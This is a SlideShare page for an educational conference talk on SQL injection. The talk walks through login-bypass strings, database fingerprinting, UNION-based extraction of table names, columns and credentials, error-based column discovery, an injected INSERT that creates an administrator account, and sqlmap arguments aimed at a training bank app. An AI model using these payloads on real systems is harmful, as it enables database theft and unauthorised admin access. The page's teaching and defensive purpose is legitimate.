SlideShare a Scribd company logo

How did i steal your database CSCamp2011

Download as PPTX, PDF
Mostafa Siraj
Mostafa Siraj

This document discusses how SQL injection attacks can be used to steal database information. It begins by providing background on databases and SQL queries. It then explains how SQL injection works by altering existing SQL commands. Several examples are given of SQL injection attacks, like exploiting unvalidated login forms. The document outlines a step-by-step strategy an attacker could use to extract metadata and data from a database using SQL injection, including getting the database type and table/column names. It concludes by demonstrating how an attacker could use the extracted information to add an administrative account.

Technology
1 of 72
Downloaded 56 times
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
How Did I Steal Your DatabaseMostafa SirajApplication Security Expert
DISCLAIMERHacking websites is ILLEGALThis presentation is meant for educational purposes ONLYOnly use this stuff on YOUR website and YOUR account
Nearly all applications rely on a Datastore
What is DatabaseA Collection of Tables (Users, Orders, Countries,..etc)The tables are a collection of columns/rows
What is SQLA query language that allows interacting with the databaseSQL canRetrieve data from the databaseInsert new records in the databaseDelete records from the databaseUpdate records in the database
SQL QueriesTo get all data about Username elprince:SELECTUsername,Password, First_Name,Last_Name, PasswordFROM UsersWHERE Username=‘elprince’Gives a result:
FACTAmongst Codd's rules for a Relational Database:Metadata must be stored in the database just as regular data is
SQL Injectionis a technique where an attacker creates or alters existing SQL commandsExpose hidden data (e.g. steal all the records from the tables)Override the data (e.g. Administrators password)Execute dangerous system level commands on the database host
SQL Injection Login ExampleSELECT * FROM Users WHERE Username=‘username’AND Password=‘password’If the user entered Elprince, Elprince123the query will beSELECT * FROM Users WHERE Username=‘Elprince’AND Password=‘Elprince123’
SQL Injection Ex ContSuppose the User entered ‘ OR 1=1--, 123 the query will beSELECT * FROM Users WHERE Username=‘‘ OR 1=1--’ AND Password=‘123’-- comments everything afterwards, so the query will beSELECT * FROM Users WHERE Username=‘‘ OR 1=1--
This is not enoughYou can enhance the injection to login with the administrator accountEnter ‘ or 1=1 ORDER BY 1--, abc the query will beSELECT * FROM Users WHERE Username=‘‘ OR 1=1 ORDER BY 1--’ AND Password=‘123’
Finding SQL Injection Bugs Submit single quotation mark and observe the result Submit two single quotations and observe the result
Finding SQL Injection Bugs For multistate processes, complete all the states before observing the results For search fields try using the wildcard character %
Finding SQL Injection Bugs For numeric data, if the original value was 2 try submitting 1+1 or 3-1 If successful try using SQL-specific keywords, e.g. 67-ASCII(‘A’) If single quotes are filtered try 51-ASCII(1) [note ASCII(1)=49]
Identify the database engine The error messages will let us know the DB engine We can guess the DB based on OS or Web Server (e.g. LAMP: Linux+Apache+PHP+….)
Identify the database engineUse specific characters or commands:String concatenation in different DB engines : ‘||’FOO : ‘+’FOO : ‘‘FOO [note the space btw the 2 quotes]
Identify User privileges‘ and 1 in (SELECTuser) --‘; IF user=‘admin’ WAITFOR DELAY ‘0:0:10’--
Injection in Search Fields35
Entering Normal Input
Search Results
Trying Single Quote
I receive this errorError states that it’s
Suppose I still don’t know the DB engine, Is it Note: string concatenation in is +
I’m having an error, it’s not
Is itNote: string concatenation in Oracle is ||
Different error, still not
Is itNote: string concatenation in MySQL is blank space
It’s
The query in the backend is something like thatSELECT …,…,…,…,…FROM ….WHERE ….=…. AND ….!=….. OR ….. OR ….LIKE….A possible location for my input
The StrategyGet number of items after the SELECT statementHow many items are hereSELECT …,…,…,…,…FROM ….WHERE ….=…. AND ….!=….. OR …..>……
The Strategy2. Identify the location of the STRINGS in the SELECT StatementWhich of those are stringsSELECT …,…,…,…,…FROM ….WHERE ….=…. AND ….!=….. OR …..>……
The Strategy3. Get the Structure of the databaseSELECT …,…,…,…,…FROM ….WHERE …. UNION SELECT ….,TableNames,….,….,…FROM DatabaseStructure --=…. AND ….!=….. OR …..>……
The Strategy4. Get the data from the databaseSELECT …,…,…,…,…FROM ….WHERE …. UNION SELECT ….,Usernames,….,….,…FROM Users --=…. AND ….!=….. OR …..>……
The StrategyGet number of items after the SELECT statementIdentify the location of the STRINGS in the SELECT Statement3. Get the Structure of the database4. Get the data from the database
1. Get number of items after the SELECT statement
Error
Try another number
ResultWhy the results are less?
Try another number
Error, it’s not 8
Let’s try 7
ResultHow many columns do we have in the SELECT statement
The StrategyGet number of items after the SELECT statementIdentify the location of the STRINGS in the SELECT Statement3. Get the Structure of the database4. Get the data from the database
2. Identify the location of the STRINGS in the SELECT Statement1234') UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL#
Result
Get the Strings and the locations1234') UNION SELECT NULL,'ABC','DEF','IJK','LMN',NULL,NULL#
Result
The StrategyGet number of items after the SELECT statementIdentify the location of the STRINGS in the SELECT Statement3. Get the Structure of the database4. Get the data from the database
3. Get the Structure of the database1234') UNION SELECTNULL,NULL,NULL,table_name,NULL,NULL,NULLFROMinformation_schema.tables#
Result
The StrategyGet number of items after the SELECT statementIdentify the location of the STRINGS in the SELECT Statement3. Get the Structure of the database4. Get the data from the database
Next Queries1234') UNION SELECT NULL,NULL,NULL,column_name,NULL,NULL,NULLFROMinformation_schema.columns where table_name=‘USERS'#1234') UNION SELECTNULL,NULL,NULL,username,password,null,nullFROM users WHERE id<100#…….Continue till you get all the tables
The StrategyGet number of items after the SELECT statementIdentify the location of the STRINGS in the SELECT Statement3. Get the Structure of the database4. Get the data from the database
Injection with errors
Gives me an Error
Getting version' and 1 in (SELECT @@version)--
Gives me this error
Getting Column names
I get this Error
Getting next column name' group by login.firstname having 1=1--
I get this error
Again' group by login.firstname, login.surname having 1=1--
Error reveals new column name
Again' group by login.firstname, login.surname,login.username having 1=1--
New column name
Continue…
Continue…
Continue…After getting all of the columns I found a field called IsAdmin-that’s my goal -Putting the following query creates an admin account on the application‘; INSERT INTO Login(username,pwd,IsAdmin,……)VALUES(‘Administrator’,’******’,TRUE,…..)
Not all Injections generate errors
DEMOSQLMap
You Were GREAT Audience
Thank You@mostafasirajMostafa Siraj

More Related Content

What's hot (20)

PDF
Hacking XPATH 2.0
michelemanzotti
 
PPTX
Namespace and methods
JayanthiNeelampalli
 
PPTX
Xpath injection in XML databases
Triad Square InfoSec
 
PPT
Creating a database
Rahul Gupta
 
PPT
ShmooCon 2009 - (Re)Playing(Blind)Sql
Chema Alonso
 
PPTX
Playing With (B)Sqli
Chema Alonso
 
PDF
Sitecore 7: A developers quest to mastering unit testing
nonlinear creations
 
PPT
Asegúr@IT IV - Remote File Downloading
Chema Alonso
 
PDF
Java Collections | Collections Framework in Java | Java Tutorial For Beginner...
Edureka!
 
PPTX
บทที่4
Waritsara Sonchan
 
PPTX
Introduction to MySQL in PHP
hamsa nandhini
 
PDF
Sq linjection
Mahesh Gupta (DBATAG) - SQL Server Consultant
 
PPTX
XML & XPath Injections
AMol NAik
 
PDF
Generics. PECS
Uptech
 
PPT
ALL ABOUT SQL AND RDBMS
gaurav koriya
 
PPT
plsql Les09
sasa_eldoby
 
PDF
Sqlalchemy sqlの錬金術
Atsushi Odagiri
 
PPTX
Apachepoitutorial
Srikrishna k
 
PPTX
V18 alias-c
Dhirendra Chauhan
 
DOCX
Fluent api configuration
Mehdi jannati
 
Hacking XPATH 2.0
michelemanzotti
 
Namespace and methods
JayanthiNeelampalli
 
Xpath injection in XML databases
Triad Square InfoSec
 
Creating a database
Rahul Gupta
 
ShmooCon 2009 - (Re)Playing(Blind)Sql
Chema Alonso
 
Playing With (B)Sqli
Chema Alonso
 
Sitecore 7: A developers quest to mastering unit testing
nonlinear creations
 
Asegúr@IT IV - Remote File Downloading
Chema Alonso
 
Java Collections | Collections Framework in Java | Java Tutorial For Beginner...
Edureka!
 
บทที่4
Waritsara Sonchan
 
Introduction to MySQL in PHP
hamsa nandhini
 
Sq linjection
Mahesh Gupta (DBATAG) - SQL Server Consultant
 
XML & XPath Injections
AMol NAik
 
Generics. PECS
Uptech
 
ALL ABOUT SQL AND RDBMS
gaurav koriya
 
plsql Les09
sasa_eldoby
 
Sqlalchemy sqlの錬金術
Atsushi Odagiri
 
Apachepoitutorial
Srikrishna k
 
V18 alias-c
Dhirendra Chauhan
 
Fluent api configuration
Mehdi jannati
 

Similar to How did i steal your database CSCamp2011 (20)

PPT
Sql Injection Adv Owasp
Aung Khant
 
PPT
Advanced SQL Injection
amiable_indian
 
PPT
PHP - Introduction to Advanced SQL
Vibrant Technologies & Computers
 
PDF
business articles
client001competitors
 
PPTX
03. sql and other injection module v17
Eoin Keary
 
PDF
Hacking Your Way To Better Security
Colin O'Dell
 
PPTX
Hacking Your Way to Better Security - PHP South Africa 2016
Colin O'Dell
 
PPTX
Hacking Your Way To Better Security - Dutch PHP Conference 2016
Colin O'Dell
 
PDF
Hacking Your Way To Better Security - php[tek] 2016
Colin O'Dell
 
PPT
SQL Injection in PHP
Dave Ross
 
PPTX
Hacking Your Way to Better Security - ZendCon 2016
Colin O'Dell
 
PPT
Advanced Sql Injection ENG
Dmitry Evteev
 
PDF
How to lose your database and your job
Ryan Gooler
 
PDF
POWER OF VISUALIZATION
sihleGumede3
 
PPT
Sql injection
Nitish Kumar
 
PPTX
Hacking Your Way To Better Security - DrupalCon Baltimore 2017
Colin O'Dell
 
PPTX
Sql injection
Hemendra Kumar
 
PPTX
SQL Injection
Wenonah Abadilla
 
PDF
SQL Injection Attack Guide for ethical hacking
Ayan Live Rourkela
 
PDF
Chapter 14 sql injection
newbie2019
 
Sql Injection Adv Owasp
Aung Khant
 
Advanced SQL Injection
amiable_indian
 
PHP - Introduction to Advanced SQL
Vibrant Technologies & Computers
 
business articles
client001competitors
 
03. sql and other injection module v17
Eoin Keary
 
Hacking Your Way To Better Security
Colin O'Dell
 
Hacking Your Way to Better Security - PHP South Africa 2016
Colin O'Dell
 
Hacking Your Way To Better Security - Dutch PHP Conference 2016
Colin O'Dell
 
Hacking Your Way To Better Security - php[tek] 2016
Colin O'Dell
 
SQL Injection in PHP
Dave Ross
 
Hacking Your Way to Better Security - ZendCon 2016
Colin O'Dell
 
Advanced Sql Injection ENG
Dmitry Evteev
 
How to lose your database and your job
Ryan Gooler
 
POWER OF VISUALIZATION
sihleGumede3
 
Sql injection
Nitish Kumar
 
Hacking Your Way To Better Security - DrupalCon Baltimore 2017
Colin O'Dell
 
Sql injection
Hemendra Kumar
 
SQL Injection
Wenonah Abadilla
 
SQL Injection Attack Guide for ethical hacking
Ayan Live Rourkela
 
Chapter 14 sql injection
newbie2019
 
Ad

Recently uploaded (20)

PDF
Predicting the unpredictable: re-engineering recommendation algorithms for fr...
Speck&Tech
 
PDF
Building Resilience with Digital Twins : Lessons from Korea
SANGHEE SHIN
 
PDF
Smart Trailers 2025 Update with History and Overview
Paul Menig
 
PPTX
Top iOS App Development Company in the USA for Innovative Apps
SynapseIndia
 
PDF
Log-Based Anomaly Detection: Enhancing System Reliability with Machine Learning
Mohammed BEKKOUCHE
 
PPTX
AUTOMATION AND ROBOTICS IN PHARMA INDUSTRY.pptx
sameeraaabegumm
 
PDF
LLMs.txt: Easily Control How AI Crawls Your Site
Keploy
 
PPTX
✨Unleashing Collaboration: Salesforce Channels & Community Power in Patna!✨
SanjeetMishra29
 
PDF
Persuasive AI: risks and opportunities in the age of digital debate
Speck&Tech
 
PDF
Using FME to Develop Self-Service CAD Applications for a Major UK Police Force
Safe Software
 
PDF
HCIP-Data Center Facility Deployment V2.0 Training Material (Without Remarks ...
mcastillo49
 
PDF
Impact of IEEE Computer Society in Advancing Emerging Technologies including ...
Hironori Washizaki
 
PDF
NewMind AI Journal - Weekly Chronicles - July'25 Week II
NewMind AI
 
PPTX
OpenID AuthZEN - Analyst Briefing July 2025
David Brossard
 
PDF
CIFDAQ Token Spotlight for 9th July 2025
CIFDAQ
 
PPTX
WooCommerce Workshop: Bring Your Laptop
Laura Hartwig
 
PDF
SWEBOK Guide and Software Services Engineering Education
Hironori Washizaki
 
PDF
HubSpot Main Hub: A Unified Growth Platform
Jaswinder Singh
 
PDF
Wojciech Ciemski for Top Cyber News MAGAZINE. June 2025
Dr. Ludmila Morozova-Buss
 
PDF
Chris Elwell Woburn, MA - Passionate About IT Innovation
Chris Elwell Woburn, MA
 
Predicting the unpredictable: re-engineering recommendation algorithms for fr...
Speck&Tech
 
Building Resilience with Digital Twins : Lessons from Korea
SANGHEE SHIN
 
Smart Trailers 2025 Update with History and Overview
Paul Menig
 
Top iOS App Development Company in the USA for Innovative Apps
SynapseIndia
 
Log-Based Anomaly Detection: Enhancing System Reliability with Machine Learning
Mohammed BEKKOUCHE
 
AUTOMATION AND ROBOTICS IN PHARMA INDUSTRY.pptx
sameeraaabegumm
 
LLMs.txt: Easily Control How AI Crawls Your Site
Keploy
 
✨Unleashing Collaboration: Salesforce Channels & Community Power in Patna!✨
SanjeetMishra29
 
Persuasive AI: risks and opportunities in the age of digital debate
Speck&Tech
 
Using FME to Develop Self-Service CAD Applications for a Major UK Police Force
Safe Software
 
HCIP-Data Center Facility Deployment V2.0 Training Material (Without Remarks ...
mcastillo49
 
Impact of IEEE Computer Society in Advancing Emerging Technologies including ...
Hironori Washizaki
 
NewMind AI Journal - Weekly Chronicles - July'25 Week II
NewMind AI
 
OpenID AuthZEN - Analyst Briefing July 2025
David Brossard
 
CIFDAQ Token Spotlight for 9th July 2025
CIFDAQ
 
WooCommerce Workshop: Bring Your Laptop
Laura Hartwig
 
SWEBOK Guide and Software Services Engineering Education
Hironori Washizaki
 
HubSpot Main Hub: A Unified Growth Platform
Jaswinder Singh
 
Wojciech Ciemski for Top Cyber News MAGAZINE. June 2025
Dr. Ludmila Morozova-Buss
 
Chris Elwell Woburn, MA - Passionate About IT Innovation
Chris Elwell Woburn, MA
 
Ad

How did i steal your database CSCamp2011

  • 1. How Did I Steal Your DatabaseMostafa SirajApplication Security Expert
  • 2. DISCLAIMERHacking websites is ILLEGALThis presentation is meant for educational purposes ONLYOnly use this stuff on YOUR website and YOUR account
  • 3. Nearly all applications rely on a Datastore
  • 4. What is DatabaseA Collection of Tables (Users, Orders, Countries,..etc)The tables are a collection of columns/rows
  • 5. What is SQLA query language that allows interacting with the databaseSQL canRetrieve data from the databaseInsert new records in the databaseDelete records from the databaseUpdate records in the database
  • 6. SQL QueriesTo get all data about Username elprince:SELECTUsername,Password, First_Name,Last_Name, PasswordFROM UsersWHERE Username=‘elprince’Gives a result:
  • 7. FACTAmongst Codd's rules for a Relational Database:Metadata must be stored in the database just as regular data is
  • 8. SQL Injectionis a technique where an attacker creates or alters existing SQL commandsExpose hidden data (e.g. steal all the records from the tables)Override the data (e.g. Administrators password)Execute dangerous system level commands on the database host
  • 9. SQL Injection Login ExampleSELECT * FROM Users WHERE Username=‘username’AND Password=‘password’If the user entered Elprince, Elprince123the query will beSELECT * FROM Users WHERE Username=‘Elprince’AND Password=‘Elprince123’
  • 10. SQL Injection Ex ContSuppose the User entered ‘ OR 1=1--, 123 the query will beSELECT * FROM Users WHERE Username=‘‘ OR 1=1--’ AND Password=‘123’-- comments everything afterwards, so the query will beSELECT * FROM Users WHERE Username=‘‘ OR 1=1--
  • 11. This is not enoughYou can enhance the injection to login with the administrator accountEnter ‘ or 1=1 ORDER BY 1--, abc the query will beSELECT * FROM Users WHERE Username=‘‘ OR 1=1 ORDER BY 1--’ AND Password=‘123’
  • 12. Finding SQL Injection Bugs Submit single quotation mark and observe the result Submit two single quotations and observe the result
  • 13. Finding SQL Injection Bugs For multistate processes, complete all the states before observing the results For search fields try using the wildcard character %
  • 14. Finding SQL Injection Bugs For numeric data, if the original value was 2 try submitting 1+1 or 3-1 If successful try using SQL-specific keywords, e.g. 67-ASCII(‘A’) If single quotes are filtered try 51-ASCII(1) [note ASCII(1)=49]
  • 15. Identify the database engine The error messages will let us know the DB engine We can guess the DB based on OS or Web Server (e.g. LAMP: Linux+Apache+PHP+….)
  • 16. Identify the database engineUse specific characters or commands:String concatenation in different DB engines : ‘||’FOO : ‘+’FOO : ‘‘FOO [note the space btw the 2 quotes]
  • 17. Identify User privileges‘ and 1 in (SELECTuser) --‘; IF user=‘admin’ WAITFOR DELAY ‘0:0:10’--
  • 22. I receive this errorError states that it’s
  • 23. Suppose I still don’t know the DB engine, Is it Note: string concatenation in is +
  • 24. I’m having an error, it’s not
  • 25. Is itNote: string concatenation in Oracle is ||
  • 27. Is itNote: string concatenation in MySQL is blank space
  • 29. The query in the backend is something like thatSELECT …,…,…,…,…FROM ….WHERE ….=…. AND ….!=….. OR ….. OR ….LIKE….A possible location for my input
  • 30. The StrategyGet number of items after the SELECT statementHow many items are hereSELECT …,…,…,…,…FROM ….WHERE ….=…. AND ….!=….. OR …..>……
  • 31. The Strategy2. Identify the location of the STRINGS in the SELECT StatementWhich of those are stringsSELECT …,…,…,…,…FROM ….WHERE ….=…. AND ….!=….. OR …..>……
  • 32. The Strategy3. Get the Structure of the databaseSELECT …,…,…,…,…FROM ….WHERE …. UNION SELECT ….,TableNames,….,….,…FROM DatabaseStructure --=…. AND ….!=….. OR …..>……
  • 33. The Strategy4. Get the data from the databaseSELECT …,…,…,…,…FROM ….WHERE …. UNION SELECT ….,Usernames,….,….,…FROM Users --=…. AND ….!=….. OR …..>……
  • 34. The StrategyGet number of items after the SELECT statementIdentify the location of the STRINGS in the SELECT Statement3. Get the Structure of the database4. Get the data from the database
  • 35. 1. Get number of items after the SELECT statement
  • 36. Error
  • 42. ResultHow many columns do we have in the SELECT statement
  • 43. The StrategyGet number of items after the SELECT statementIdentify the location of the STRINGS in the SELECT Statement3. Get the Structure of the database4. Get the data from the database
  • 44. 2. Identify the location of the STRINGS in the SELECT Statement1234') UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL#
  • 46. Get the Strings and the locations1234') UNION SELECT NULL,'ABC','DEF','IJK','LMN',NULL,NULL#
  • 48. The StrategyGet number of items after the SELECT statementIdentify the location of the STRINGS in the SELECT Statement3. Get the Structure of the database4. Get the data from the database
  • 49. 3. Get the Structure of the database1234') UNION SELECTNULL,NULL,NULL,table_name,NULL,NULL,NULLFROMinformation_schema.tables#
  • 51. The StrategyGet number of items after the SELECT statementIdentify the location of the STRINGS in the SELECT Statement3. Get the Structure of the database4. Get the data from the database
  • 52. Next Queries1234') UNION SELECT NULL,NULL,NULL,column_name,NULL,NULL,NULLFROMinformation_schema.columns where table_name=‘USERS'#1234') UNION SELECTNULL,NULL,NULL,username,password,null,nullFROM users WHERE id<100#…….Continue till you get all the tables
  • 53. The StrategyGet number of items after the SELECT statementIdentify the location of the STRINGS in the SELECT Statement3. Get the Structure of the database4. Get the data from the database
  • 54. Injection with errors
  • 55. Gives me an Error
  • 56. Getting version' and 1 in (SELECT @@version)--
  • 59. I get this Error
  • 60. Getting next column name' group by login.firstname having 1=1--
  • 61. I get this error
  • 62. Again' group by login.firstname, login.surname having 1=1--
  • 63. Error reveals new column name
  • 64. Again' group by login.firstname, login.surname,login.username having 1=1--
  • 68. Continue…After getting all of the columns I found a field called IsAdmin-that’s my goal -Putting the following query creates an admin account on the application‘; INSERT INTO Login(username,pwd,IsAdmin,……)VALUES(‘Administrator’,’******’,TRUE,…..)
  • 69. Not all Injections generate errors
  • 71. You Were GREAT Audience

Editor's Notes

  • #71: -u &quot;http://rajpc/HacmeBank_v2_Website/aspx/Main.aspx?function=TransactionDetails&amp;account_no=5204320422040001&quot; --cookie &quot;ASP.NET_SessionId=fadqryjsmlb52y45hztq0pvc; CookieLoginAttempts=5; Admin=false&quot; -p account_no